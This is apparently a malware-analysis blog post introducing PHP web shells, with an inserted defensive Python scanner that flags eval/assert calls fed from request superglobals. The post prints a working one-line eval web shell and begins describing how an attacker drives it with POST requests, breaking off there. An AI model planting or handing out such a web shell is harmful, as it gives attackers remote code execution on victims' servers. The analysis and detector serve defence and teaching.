Of the various pieces of malware I’ve analyzed, I still find web shells to be the most fascinating. While this is not a new topic, I’ve been asked by others to do a write-up on web shells, so here it is ;).
For those new to web shells, think of this type of malware as code designed to be executed by the web server — instead of writing a backdoor in C, for example, an attacker can write malicious PHP and upload the code directly to a vulnerable web server. Web shells span across many different languages and server types.
Web shells 101
To better understand web shells, let’s take a look at a simple eval web shell below:
<?php ${${eval($_POST[potato])}};?>;
This is a very simple yet dangerous eval web shell that I still see in use to this day in targeted engagements (an .asp or .aspx equivalent eval web shell exists for Windows Internet Information Services). This PHP web shell takes any arbitrary PHP code assigned to the POST variable potato and evaluates it. Let’s see how this would work in the real world. Let’s say an attacker has found a way to create the PHP file a.php inside your web directory.
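As an added example that is not part of the original post, here is a small Python heuristic scanner written from the defender’s side: it flags PHP files whose eval() or assert() call is fed directly from a request superglobal, including the variable-variable wrapping used by the one-liner above. The sample file contents and the scan_tree() helper are my own constructions, not code from the post.

```python
import re
from pathlib import Path

# Constructed sample files: the page's eval shell (wrapped in variable-variables),
# a variant reading from $_REQUEST, and a benign file that only mentions eval in a comment.
SAMPLES = {
    "a.php": "<?php ${${eval($_POST[potato])}};?>;",
    "b.php": "<?php eval ( $_REQUEST['cmd'] ); ?>",
    "ok.php": "<?php // eval() is never called here\necho htmlspecialchars($_GET['q']); ?>",
}

# Matches eval()/assert() whose argument (directly or via a nested expression on the
# same statement) pulls from a user-controlled request superglobal. Whitespace between
# the call name and the opening parenthesis is tolerated, as in sample b.php.
EVAL_SINK = re.compile(
    r"\b(eval|assert)\s*\(\s*[^;]*?\$_(POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def strip_comments(src: str) -> str:
    """Drop /* */ and // comments so a mention of eval in a comment does not fire.
    Heuristic only: a '//' inside a string literal (e.g. a URL) is also stripped."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.DOTALL)
    return re.sub(r"//[^\n]*", "", src)


def find_eval_shell_lines(src: str) -> list[int]:
    """Return 1-based line numbers containing an eval-style sink fed from a request superglobal."""
    hits = []
    for lineno, line in enumerate(strip_comments(src).splitlines(), start=1):
        if EVAL_SINK.search(line):
            hits.append(lineno)
    return hits


def scan_tree(root: Path) -> dict[str, list[int]]:
    """Walk a web root and report PHP files with suspicious eval sinks (path -> line numbers)."""
    findings = {}
    for path in root.rglob("*.php"):
        hits = find_eval_shell_lines(path.read_text(errors="replace"))
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings


def scan_samples() -> dict[str, list[int]]:
    """Run the detector over the constructed samples; a.php and b.php should be flagged."""
    return {name: find_eval_shell_lines(src) for name, src in SAMPLES.items()}
```

A regex pass like this is a triage aid for files that appeared in the web root unexpectedly, not a replacement for file-integrity monitoring of the document root.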
Once the PHP file is created, we can begin issuing commands to the web shell. Let’s see what happens when we issue a simple ipconfig. To issue this POST request, we’ll be using a tool called Postman.